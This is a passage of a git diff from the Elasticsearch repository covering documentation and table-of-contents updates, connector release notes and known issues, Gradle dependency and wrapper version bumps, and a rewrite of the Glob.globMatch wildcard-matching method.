b/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md index e7f6578d5369a..ebad528a2ad92 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-semantic-query.md @@ -2,6 +2,9 @@ navigation_title: "Semantic" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-semantic-query.html +applies_to: + stack: ga 9.0 + serverless: ga --- # Semantic query [query-dsl-semantic-query] diff --git a/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md b/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md index e0df2c8dc14c1..ce46713dad3c5 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-sparse-vector-query.md @@ -150,7 +150,7 @@ GET my-index/_search } ``` -This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers.md#standard-retriever). +This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md). ```console GET my-index/_search diff --git a/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md b/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md index 1eca639ea6462..148f6f304278e 100644 --- a/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md +++ b/docs/reference/query-languages/query-dsl/query-dsl-text-expansion-query.md @@ -134,7 +134,7 @@ GET my-index/_search } ``` -This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers.md#rrf-retriever) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers.md#standard-retriever). +This can also be achieved using [reciprocal rank fusion (RRF)](/reference/elasticsearch/rest-apis/reciprocal-rank-fusion.md), through an [`rrf` retriever](/reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md) with multiple [`standard` retrievers](/reference/elasticsearch/rest-apis/retrievers/standard-retriever.md). ```console GET my-index/_search diff --git a/docs/reference/query-languages/querydsl.md b/docs/reference/query-languages/querydsl.md index 7737d09665329..b98b20740732f 100644 --- a/docs/reference/query-languages/querydsl.md +++ b/docs/reference/query-languages/querydsl.md @@ -6,8 +6,6 @@ mapped_pages: # QueryDSL [query-dsl] :::{note} -This section provides detailed **reference information**. - Refer to the [Query DSL overview](docs-content://explore-analyze/query-filter/languages/querydsl.md) in the **Explore and analyze** section for overview and conceptual information about Query DSL. ::: diff --git a/docs/reference/query-languages/toc.yml b/docs/reference/query-languages/toc.yml index 861435ccdc8cf..ff9ea4a7ddafd 100644 --- a/docs/reference/query-languages/toc.yml +++ b/docs/reference/query-languages/toc.yml @@ -2,6 +2,7 @@ toc: - file: index.md - file: querydsl.md children: + - file: query-dsl/full-text-filter-tutorial.md - file: query-dsl/query-filter-context.md - file: query-dsl/compound-queries.md children: @@ -84,13 +85,37 @@ toc: - file: query-dsl/regexp-syntax.md - file: esql.md children: + - file: esql/esql-getting-started.md + - file: esql/esql-rest.md - file: esql/esql-syntax-reference.md children: - file: esql/esql-syntax.md - file: esql/esql-commands.md children: - file: esql/commands/source-commands.md + children: + - file: esql/commands/from.md + - file: esql/commands/row.md + - file: esql/commands/show.md - file: esql/commands/processing-commands.md + children: + - file: esql/commands/change-point.md + - file: esql/commands/completion.md + - file: esql/commands/dissect.md + - file: esql/commands/drop.md + - file: esql/commands/enrich.md + - file: esql/commands/eval.md + - file: esql/commands/fork.md + - file: esql/commands/grok.md + - file: esql/commands/keep.md + - file: esql/commands/limit.md + - file: esql/commands/lookup-join.md + - file: esql/commands/mv_expand.md + - file: esql/commands/rename.md + - file: esql/commands/sample.md + - file: esql/commands/sort.md + - file: esql/commands/stats-by.md + - file: esql/commands/where.md - file: esql/esql-functions-operators.md children: - file: esql/functions-operators/aggregation-functions.md @@ -105,6 +130,10 @@ toc: - file: esql/functions-operators/type-conversion-functions.md - file: esql/functions-operators/mv-functions.md - file: esql/functions-operators/operators.md + - file: esql/esql-multi.md + children: + - file: esql/esql-multi-index.md + - file: esql/esql-cross-clusters.md - file: esql/esql-advanced.md children: - file: esql/esql-process-data-with-dissect-grok.md @@ -116,9 +145,14 @@ toc: - file: esql/esql-time-spans.md - file: esql/esql-metadata-fields.md - file: esql/esql-multivalued-fields.md - - - file: esql/limitations.md - file: esql/esql-examples.md + children: + - file: esql/esql-search-tutorial.md + - file: esql/esql-troubleshooting.md + children: + - file: esql/esql-query-log.md + - file: esql/esql-task-management.md + - file: esql/limitations.md - file: sql.md children: - file: sql/sql-spec.md @@ -158,5 +192,4 @@ toc: - file: eql/eql-syntax.md - file: eql/eql-function-ref.md - file: eql/eql-pipe-ref.md - - file: eql/eql-ex-threat-detection.md - file: kql.md diff --git a/docs/reference/search-connectors/index.md b/docs/reference/search-connectors/index.md index 30452ad9b11a3..991d7ae0bc9e5 100644 --- a/docs/reference/search-connectors/index.md +++ b/docs/reference/search-connectors/index.md @@ -8,13 +8,13 @@ mapped_pages: - https://www.elastic.co/guide/en/enterprise-search/current/connectors.html --- -# Search connectors +# Content connectors $$$es-connectors-native$$$ :::{note} -This page is about Search connectors that synchronize third-party data into {{es}}. If you’re looking for Kibana connectors to integrate with services like generative AI model providers, refer to [Kibana Connectors](docs-content://deploy-manage/manage-connectors.md). +This page is about content connectors that synchronize third-party data into {{es}}. If you’re looking for Kibana connectors to integrate with services like generative AI model providers, refer to [Kibana Connectors](docs-content://deploy-manage/manage-connectors.md). ::: A _connector_ is an Elastic integration that syncs data from an original data source to {{es}}. Use connectors to create searchable, read-only replicas of your data in {{es}}. @@ -30,38 +30,53 @@ These connectors are written in Python and the source code is available in the [ As of Elastic 9.0, managed connectors on Elastic Cloud Hosted are no longer available. All connectors must be [self-managed](/reference/search-connectors/self-managed-connectors.md). :::: - -Connectors are available for the following third-party data sources: - -- [Azure Blob Storage](/reference/search-connectors/es-connectors-azure-blob.md) -- [Box](/reference/search-connectors/es-connectors-box.md) -- [Confluence](/reference/search-connectors/es-connectors-confluence.md) -- [Dropbox](/reference/search-connectors/es-connectors-dropbox.md) -- [GitHub](/reference/search-connectors/es-connectors-github.md) -- [Gmail](/reference/search-connectors/es-connectors-gmail.md) -- [Google Cloud Storage](/reference/search-connectors/es-connectors-google-cloud.md) -- [Google Drive](/reference/search-connectors/es-connectors-google-drive.md) -- [GraphQL](/reference/search-connectors/es-connectors-graphql.md) -- [Jira](/reference/search-connectors/es-connectors-jira.md) -- [MicrosoftSQL](/reference/search-connectors/es-connectors-ms-sql.md) -- [MongoDB](/reference/search-connectors/es-connectors-mongodb.md) -- [MySQL](/reference/search-connectors/es-connectors-mysql.md) -- [Network drive](/reference/search-connectors/es-connectors-network-drive.md) -- [Notion](/reference/search-connectors/es-connectors-notion.md) -- [OneDrive](/reference/search-connectors/es-connectors-onedrive.md) -- [OpenText Documentum](/reference/search-connectors/es-connectors-opentext.md) -- [Oracle](/reference/search-connectors/es-connectors-oracle.md) -- [Outlook](/reference/search-connectors/es-connectors-outlook.md) -- [PostgreSQL](/reference/search-connectors/es-connectors-postgresql.md) -- [Redis](/reference/search-connectors/es-connectors-redis.md) -- [S3](/reference/search-connectors/es-connectors-s3.md) -- [Salesforce](/reference/search-connectors/es-connectors-salesforce.md) -- [ServiceNow](/reference/search-connectors/es-connectors-servicenow.md) -- [SharePoint Online](/reference/search-connectors/es-connectors-sharepoint-online.md) -- [SharePoint Server](/reference/search-connectors/es-connectors-sharepoint.md) -- [Slack](/reference/search-connectors/es-connectors-slack.md) -- [Teams](/reference/search-connectors/es-connectors-teams.md) -- [Zoom](/reference/search-connectors/es-connectors-zoom.md) +This table provides an overview of our available connectors, their current support status, and the features they support. + +The columns provide specific information about each connector: + +- **Status**: Indicates whether the connector is in General Availability (GA), Technical Preview, Beta, or is an Example connector. +- **Advanced sync rules**: Specifies the versions in which advanced sync rules are supported, if applicable. +- **Local binary extraction service**: Specifies the versions in which the local binary extraction service is supported, if applicable. +- **Incremental syncs**: Specifies the version in which incremental syncs are supported, if applicable. +- **Document level security**: Specifies the version in which document level security is supported, if applicable. + + + +| Connector | Status | [Advanced sync rules](./es-sync-rules.md#es-sync-rules-advanced) | [Local binary extraction service](./es-connectors-content-extraction.md#es-connectors-content-extraction-local) | [Incremental syncs](./content-syncs.md#es-connectors-sync-types-incremental) | [Document level security](./document-level-security.md) | Source code | +| ------- | --------------- | -- | -- | -- | -- | -- | +| [Azure Blob](/reference/search-connectors/es-connectors-azure-blob.md) | **GA** | - | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/azure_blob_storage.py) | +| [Box](/reference/search-connectors/es-connectors-box.md) | **Preview** | - | - | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/box.py) | +| [Confluence Cloud](/reference/search-connectors/es-connectors-confluence.md) | **GA** | 8.9+ | 8.11+ | 8.13+ | 8.10 | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/confluence.py) | +| [Confluence Data Center](/reference/search-connectors/es-connectors-confluence.md) | **Preview** | 8.13+ | 8.13+ | 8.13+ | 8.14+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/confluence.py) | +| [Confluence Server](/reference/search-connectors/es-connectors-confluence.md)| **GA** | 8.9+ | 8.11+ | 8.13+ | 8.14+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/confluence.py) | +| [Dropbox](/reference/search-connectors/es-connectors-dropbox.md)| **GA** | - | 8.11+ | 8.13+ | 8.12+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/dropbox.py) | +| [GitHub](/reference/search-connectors/es-connectors-github.md)| **GA** | 8.10+ | 8.11+ | 8.13+ | 8.12+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/github.py) | +| [Gmail](/reference/search-connectors/es-connectors-gmail.md)| **GA** | - | - | 8.13+ | 8.10+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/gmail.py) | +| [Google Cloud Storage](/reference/search-connectors/es-connectors-google-cloud.md)| **GA** | - | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/google_cloud_storage.py) | +| [Google Drive](/reference/search-connectors/es-connectors-google-drive.md)| **GA** | - | 8.11+ | 8.13+ | 8.10+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/google_drive.py) | +| [GraphQL](/reference/search-connectors/es-connectors-graphql.md)| **Preview** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/graphql.py) | +| [Jira Cloud](/reference/search-connectors/es-connectors-jira.md)| **GA** | 8.9+ | 8.11+ | 8.13+ | 8.10+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/jira.py) | +| [Jira Data Center](/reference/search-connectors/es-connectors-jira.md)| **Preview** | 8.13+ | 8.13+ | 8.13+ | 8.13+*| [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/jira.py) | +| [Jira Server](/reference/search-connectors/es-connectors-jira.md)| **GA** | 8.9+ | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/jira.py) | +| [Microsoft SQL Server](/reference/search-connectors/es-connectors-ms-sql.md)| **GA** | 8.11+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/mssql.py) | +| [MongoDB](/reference/search-connectors/es-connectors-mongodb.md)| **GA** | 8.8 native/ 8.12 self-managed | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/mongo.py) | +| [MySQL](/reference/search-connectors/es-connectors-mysql.md)| **GA** | 8.8+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/mysql.py) | +| [Network drive](/reference/search-connectors/es-connectors-network-drive.md)| **GA** | 8.10+ | 8.14+ | 8.13+ | 8.11+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/network_drive.py) | +| [Notion](/reference/search-connectors/es-connectors-notion.md)| **GA** | 8.14+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/notion.py) | +| [OneDrive](/reference/search-connectors/es-connectors-onedrive.md)| **GA** | 8.11+ | 8.11+ | 8.13+ | 8.11+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/onedrive.py) | +| [Opentext Documentum](/reference/search-connectors/es-connectors-opentext.md)| **Example** | n/a | n/a | n/a | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/opentext_documentum.py) | +| [Oracle](/reference/search-connectors/es-connectors-oracle.md)| **GA** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/oracle.py) | +| [Outlook](/reference/search-connectors/es-connectors-outlook.md)| **GA** | - | 8.11+ | 8.13+ | 8.14+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/outlook.py) | +| [PostgreSQL](/reference/search-connectors/es-connectors-postgresql.md)| **GA** | 8.11+ | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/postgresql.py) | +| [Redis](/reference/search-connectors/es-connectors-redis.md)| **Preview** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/redis.py) | +| [Amazon S3](/reference/search-connectors/es-connectors-s3.md)| **GA** | 8.12+ | 8.11+ | - | - |[View code](https://github.com/elastic/connectors/tree/main/connectors/sources/s3.py) | +| [Salesforce](/reference/search-connectors/es-connectors-salesforce.md)| **GA** | 8.12+ | 8.11+ | 8.13+ | 8.13+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/salesforce.py) | +| [ServiceNow](/reference/search-connectors/es-connectors-servicenow.md)| **GA** | 8.10+ | 8.11+ | 8.13+ | 8.13+ | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/servicenow.py) | +| [Sharepoint Online](/reference/search-connectors/es-connectors-sharepoint-online.md)| **GA** | 8.9+ | 8.9+ | 8.9+ | 8.9+ |[View code](https://github.com/elastic/connectors/tree/main/connectors/sources/sharepoint_online.py) | +| [Sharepoint Server](/reference/search-connectors/es-connectors-sharepoint.md)| **Beta** | - | 8.11+ | 8.13+ | 8.15+ |[View code](https://github.com/elastic/connectors/tree/main/connectors/sources/sharepoint_server.py) | +| [Slack](/reference/search-connectors/es-connectors-slack.md)| **Preview** | - | - | - | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/slack.py) | +| [Teams](/reference/search-connectors/es-connectors-teams.md)| **Preview** | - | - | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/teams.py) | +| [Zoom](/reference/search-connectors/es-connectors-zoom.md)| **Preview** | - | 8.11+ | 8.13+ | - | [View code](https://github.com/elastic/connectors/tree/main/connectors/sources/zoom.py) | :::{tip} Because prerequisites and configuration details vary by data source, you’ll need to refer to the individual connector references for specific details. @@ -69,7 +84,6 @@ Because prerequisites and configuration details vary by data source, you’ll ne ## Overview - Because connectors are self-managed on your own infrastructure, they run outside of your Elastic deployment. You can run them from source or in a Docker container. diff --git a/docs/reference/search-connectors/release-notes.md b/docs/reference/search-connectors/release-notes.md index c0630e4f1bf0c..586bff33d8f06 100644 --- a/docs/reference/search-connectors/release-notes.md +++ b/docs/reference/search-connectors/release-notes.md @@ -13,6 +13,36 @@ If you are an Enterprise Search user and want to upgrade to Elastic 9.0, refer t It includes detailed steps, tooling, and resources to help you transition to supported alternatives in 9.x, such as Elasticsearch, the Open Web Crawler, and self-managed connectors. ::: +## 9.1.3 [connectors-9.1.3-release-notes] +There are no new features, enhancements, fixes, known issues, or deprecations associated with this release. + +## 9.1.2 [connectors-9.1.2-release-notes] +There are no new features, enhancements, fixes, known issues, or deprecations associated with this release. + +## 9.1.1 [connectors-9.1.1-release-notes] + +### Fixes [connectors-9.1.1-fixes] + +:::{dropdown} Resolves missing access control for “Everyone Except External Users” in SharePoint connector + +Permissions granted to the `Everyone Except External Users` group were previously ignored, causing incomplete access control metadata in documents. This occurred because the connector did not recognize the group’s login name format. +[#3577](https://github.com/elastic/connectors/pull/3577) resolves this issue by recognizing the group’s login format and correctly applying its permissions to document access control metadata. +::: + +## 9.1.0 [connectors-9.1.0-release-notes] +There are no new features, enhancements, fixes, known issues, or deprecations associated with this release. + +## 9.0.5 [connectors-9.0.5-release-notes] + +### Fixes [connectors-9.0.5-fixes] + +:::{dropdown} Resolves missing access control for `Everyone Except External Users` in SharePoint connector +Permissions granted to the `Everyone Except External Users` group were previously ignored, causing incomplete access control metadata in documents. This occurred because the connector did not recognize the group’s login name format. [#3577](https://github.com/elastic/connectors/pull/3577) resolves this issue by recognizing the group’s login format and correctly applying its permissions to document access control metadata. +::: + +## 9.0.4 [connectors-9.0.4-release-notes] +No changes since 9.0.3 + ## 9.0.3 [connectors-9.0.3-release-notes] ### Features and enhancements [connectors-9.0.3-features-enhancements] diff --git a/docs/reference/search-connectors/toc.yml b/docs/reference/search-connectors/toc.yml index 3fb2578cfebfd..adea1a18ed646 100644 --- a/docs/reference/search-connectors/toc.yml +++ b/docs/reference/search-connectors/toc.yml @@ -1,4 +1,4 @@ -project: 'Search connectors reference' +project: 'Content connectors reference' toc: - file: index.md - file: connector-reference.md diff --git a/docs/release-notes/known-issues.md b/docs/release-notes/known-issues.md index a20cff68c225c..ed3733b0f2a82 100644 --- a/docs/release-notes/known-issues.md +++ b/docs/release-notes/known-issues.md @@ -8,10 +8,19 @@ mapped_pages: Known issues are significant defects or limitations that may impact your implementation. These issues are actively being worked on and will be addressed in a future release. Review the Elasticsearch known issues to help you make informed decisions, such as upgrading to a new version. ## 9.0.3 [elasticsearch-9.0.3-known-issues] -A bug in the merge scheduler in Elasticsearch 9.0.3 may prevent shards from closing when there isn’t enough disk space to complete a merge. As a result, operations such as closing or relocating an index may hang until sufficient disk space becomes available. +* A bug in the merge scheduler in Elasticsearch 9.0.3 may prevent shards from closing when there isn’t enough disk space to complete a merge. As a result, operations such as closing or relocating an index may hang until sufficient disk space becomes available. To mitigate this issue, the disk space checker is disabled by default in 9.0.3 by setting `indices.merge.disk.check_interval` to `0` seconds. Manually enabling this setting is not recommended. -This issue is planned to be fixed in future patch release [#129613](https://github.com/elastic/elasticsearch/pull/129613) + This issue is planned to be fixed in future patch release [#129613](https://github.com/elastic/elasticsearch/pull/129613) + +* A bug in the ES|QL STATS command may yield incorrect results. The bug only happens in very specific cases that follow this pattern: `STATS ... BY keyword1, keyword2`, i.e. the command must have exactly two grouping fields, both keywords, where the first field has high cardinality (more than 65k distinct values). + + The bug is described in detail in [this issue](https://github.com/elastic/elasticsearch/issues/130644). + The problem was introduced in 8.16.0 and [fixed](https://github.com/elastic/elasticsearch/pull/130705) in 8.17.9, 8.18.7, 9.0.4. + + Possible workarounds include: + * switching the order of the grouping keys (eg. `STATS ... BY keyword2, keyword1`, if the `keyword2` has a lower cardinality) + * reducing the grouping key cardinality, by filtering out values before STATS ## 9.0.0 [elasticsearch-9.0.0-known-issues] * Elasticsearch on Windows might fail to start, or might forbid some file-related operations, when referencing paths with a case different from the one stored by the filesystem. Windows treats paths as case-insensitive, but the filesystem stores them with case. Entitlements, the new security system used by Elasticsearch, treat all paths as case-sensitive, and can therefore prevent access to a path that should be accessible. @@ -40,3 +49,12 @@ This issue will be fixed in a future patch release (see [PR #126990](https://git DELETE _index_template/.watches POST /_watcher/_start ``` + +* A bug in the ES|QL STATS command may yield incorrect results. The bug only happens in very specific cases that follow this pattern: `STATS ... BY keyword1, keyword2`, i.e. the command must have exactly two grouping fields, both keywords, where the first field has high cardinality (more than 65k distinct values). + + The bug is described in detail in [this issue](https://github.com/elastic/elasticsearch/issues/130644). + The problem was introduced in 8.16.0 and [fixed](https://github.com/elastic/elasticsearch/pull/130705) in 8.17.9, 8.18.7, 9.0.4. + + Possible workarounds include: + * switching the order of the grouping keys (eg. `STATS ... BY keyword2, keyword1`, if the `keyword2` has a lower cardinality) + * reducing the grouping key cardinality, by filtering out values before STATS diff --git a/gradle/build.versions.toml b/gradle/build.versions.toml index bf0e6873f9073..0c42445d9f126 100644 --- a/gradle/build.versions.toml +++ b/gradle/build.versions.toml @@ -2,7 +2,7 @@ asm = "9.7.1" jackson = "2.15.0" junit5 = "5.12.1" -spock = "2.1-groovy-3.0" +spock = "2.3-groovy-4.0" nmcp = "0.1.5" [libraries] @@ -22,7 +22,7 @@ hamcrest = "org.hamcrest:hamcrest:3.0" httpcore5 = "org.apache.httpcomponents.core5:httpcore5:5.3.3" httpclient5 = "org.apache.httpcomponents.client5:httpclient5:5.4.2" idea-ext = "gradle.plugin.org.jetbrains.gradle.plugin.idea-ext:gradle-idea-ext:1.1.4" -javaparser = "com.github.javaparser:javaparser-core:3.18.0" +javaparser = "com.github.javaparser:javaparser-core:3.27.0" json-schema-validator = "com.networknt:json-schema-validator:1.0.72" json-assert = "org.skyscreamer:jsonassert:1.5.0" jackson-core = { group = "com.fasterxml.jackson.core", name="jackson-core", version.ref="jackson" } @@ -40,7 +40,7 @@ mockito-core = "org.mockito:mockito-core:1.9.5" nmcp = { group = "com.gradleup.nmcp", name = "nmcp", version.ref="nmcp" } nebula-info = "com.netflix.nebula:gradle-info-plugin:11.3.3" reflections = "org.reflections:reflections:0.9.12" -shadow-plugin = "com.gradleup.shadow:shadow-gradle-plugin:8.3.5" +shadow-plugin = "com.gradleup.shadow:shadow-gradle-plugin:9.0.1" snakeyaml = { group = "org.yaml", name = "snakeyaml", version = { strictly = "2.0" } } spock-core = { group = "org.spockframework", name="spock-core", version.ref="spock" } spock-junit4 = { group = "org.spockframework", name="spock-junit4", version.ref="spock" } @@ -50,5 +50,5 @@ wiremock = "com.github.tomakehurst:wiremock-jre8-standalone:2.23.2" xmlunit-core = "org.xmlunit:xmlunit-core:2.8.2" [plugins] -ospackage = { id = "com.netflix.nebula.ospackage-base", version = "11.11.2" } +ospackage = { id = "com.netflix.nebula.ospackage-base", version = "12.1.0" } nmcp-aggregation = { id = "com.gradleup.nmcp.aggregation", version.ref="nmcp" } diff --git a/gradle/verification-metadata.xml b/gradle/verification-metadata.xml index 7e147eff76dbd..55f5012394667 100644 --- a/gradle/verification-metadata.xml +++ b/gradle/verification-metadata.xml @@ -15,6 +15,7 @@ + @@ -446,6 +447,11 @@ + + + + + @@ -471,11 +477,21 @@ + + + + + + + + + + @@ -908,9 +924,9 @@ - - - + + + @@ -1078,9 +1094,9 @@ - - - + + + @@ -1268,14 +1284,9 @@ - - - - - - - - + + + @@ -1373,9 +1384,9 @@ - - - + + + @@ -1423,16 +1434,16 @@ - - - - - + + + + + @@ -1528,6 +1539,11 @@ + + + + + @@ -1981,90 +1997,6 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - @@ -2150,24 +2082,24 @@ - - - + + + - - - + + + - - - + + + - - - + + + @@ -2180,9 +2112,9 @@ - - - + + + @@ -2200,9 +2132,14 @@ - - - + + + + + + + + @@ -2235,9 +2172,9 @@ - - - + + + @@ -2515,6 +2452,11 @@ + + + + + @@ -2853,14 +2795,14 @@ - - - + + + - - - + + + @@ -3048,6 +2990,11 @@ + + + + + @@ -3073,6 +3020,11 @@ + + + + + @@ -3208,6 +3160,11 @@ + + + + + @@ -3218,11 +3175,21 @@ + + + + + + + + + + @@ -3283,6 +3250,11 @@ + + + + + @@ -3323,9 +3295,9 @@ - - - + + + @@ -3333,29 +3305,34 @@ - - - + + + + + + + + - - - + + + - - - + + + - - - + + + - - - + + + @@ -3383,59 +3360,59 @@ - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + @@ -3481,14 +3458,14 @@ - - - + + + - - - + + + @@ -3511,6 +3488,11 @@ + + + + + @@ -3526,6 +3508,11 @@ + + + + + @@ -3536,6 +3523,11 @@ + + + + + @@ -3546,11 +3538,6 @@ - - - - - @@ -3636,6 +3623,11 @@ + + + + + @@ -3661,11 +3653,21 @@ + + + + + + + + + + @@ -3701,6 +3703,11 @@ + + + + + @@ -4211,6 +4218,11 @@ + + + + + @@ -4241,9 +4253,9 @@ - - - + + + @@ -4251,9 +4263,9 @@ - - - + + + @@ -4656,6 +4668,11 @@ + + + + + @@ -4751,9 +4768,9 @@ - - - + + + @@ -4786,9 +4803,9 @@ - - - + + + @@ -4806,9 +4823,9 @@ - - - + + + @@ -4836,14 +4853,14 @@ - - - + + + - - - + + + @@ -4896,6 +4913,11 @@ + + + + + @@ -4906,6 +4928,11 @@ + + + + + @@ -4954,174 +4981,174 @@ - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + - - - + + + diff --git a/gradle/wrapper/gradle-wrapper.properties b/gradle/wrapper/gradle-wrapper.properties index c4a852da571d7..01450089d2c6c 100644 --- a/gradle/wrapper/gradle-wrapper.properties +++ b/gradle/wrapper/gradle-wrapper.properties @@ -1,7 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionSha256Sum=443c9c8ee2ac1ee0e11881a40f2376d79c66386264a44b24a9f8ca67e633375f -distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.2-all.zip +distributionSha256Sum=f759b8dd5204e2e3fa4ca3e73f452f087153cf81bac9561eeb854229cc2c5365 +distributionUrl=https\://services.gradle.org/distributions/gradle-9.0.0-all.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/libs/build.gradle b/libs/build.gradle index efd2329ca2b5e..79806b0dc45b3 100644 --- a/libs/build.gradle +++ b/libs/build.gradle @@ -45,4 +45,14 @@ configure(childProjects.values()) { */ apply plugin: 'elasticsearch.build' } + + // This is for any code potentially included in the server at runtime. + // Omit oddball libraries that aren't in server. + def nonServerLibs = ['plugin-scanner'] + if (false == nonServerLibs.contains(project.name)) { + project.getTasks().withType(Test.class).matching(test -> ['test', 'internalClusterTest'].contains(test.name)).configureEach(test -> { + test.systemProperty('es.entitlement.enableForTests', 'true') + }) + } + } diff --git a/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java b/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java index c8ef64ced7754..6e9fa4a49a59c 100644 --- a/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java +++ b/libs/cli/src/test/java/org/elasticsearch/cli/TerminalTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.cli; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import java.io.IOException; import java.io.OutputStream; @@ -22,6 +23,7 @@ import static org.mockito.Mockito.verify; import static org.mockito.Mockito.verifyNoMoreInteractions; +@WithoutEntitlements // CLI tools don't run with entitlements enforced public class TerminalTests extends ESTestCase { public void testSystemTerminalIfRedirected() { diff --git a/libs/core/src/main/java/org/elasticsearch/core/Glob.java b/libs/core/src/main/java/org/elasticsearch/core/Glob.java index 8bc1f23c44bb5..b3e1106bd966d 100644 --- a/libs/core/src/main/java/org/elasticsearch/core/Glob.java +++ b/libs/core/src/main/java/org/elasticsearch/core/Glob.java @@ -29,34 +29,84 @@ public static boolean globMatch(String pattern, String str) { if (pattern == null || str == null) { return false; } - int firstIndex = pattern.indexOf('*'); - if (firstIndex == -1) { + + int patternIndex = pattern.indexOf('*'); + if (patternIndex == -1) { + // Nothing to glob return pattern.equals(str); } - if (firstIndex == 0) { + + if (patternIndex == 0) { + // If the pattern is a literal '*' then it matches any input if (pattern.length() == 1) { return true; } - int nextIndex = pattern.indexOf('*', firstIndex + 1); - if (nextIndex == -1) { - return str.endsWith(pattern.substring(1)); - } else if (nextIndex == 1) { - // Double wildcard "**" - skipping the first "*" - return globMatch(pattern.substring(1), str); + } else { + if (str.regionMatches(0, pattern, 0, patternIndex) == false) { + // If the pattern starts with a literal (i.e. not '*') then the input string must also start with that + return false; } - String part = pattern.substring(1, nextIndex); - int partIndex = str.indexOf(part); - while (partIndex != -1) { - if (globMatch(pattern.substring(nextIndex), str.substring(partIndex + part.length()))) { - return true; + if (patternIndex == pattern.length() - 1) { + // The pattern is "something*", so if the starting region matches, then the whole pattern matches + return true; + } + } + + int strIndex = patternIndex; + while (strIndex < str.length()) { + assert pattern.charAt(patternIndex) == '*' : "Expected * at index " + patternIndex + " of [" + pattern + "]"; + + // skip over the '*' + patternIndex++; + + if (patternIndex == pattern.length()) { + // The pattern ends in '*' (that is, "something*" or "*some*thing*", etc) + // Since we already matched everything up to the '*' we know the string matches (whatever is left over must match '*') + // so we're automatically done + return true; + } + + // Look for the next '*' + int nextStar = pattern.indexOf('*', patternIndex); + while (nextStar == patternIndex) { + // Two (or more) stars in sequence, just skip the subsequent ones + patternIndex++; + nextStar = pattern.indexOf('*', patternIndex); + } + if (nextStar == -1) { + // We've come to the last '*' in a pattern (.e.g the 2nd one in "*some*thing") + // In this case we match if the input string ends in "thing" (but constrained by the current position) + final int len = pattern.length() - patternIndex; + final int strSuffixStart = str.length() - len; + if (strSuffixStart < strIndex) { + 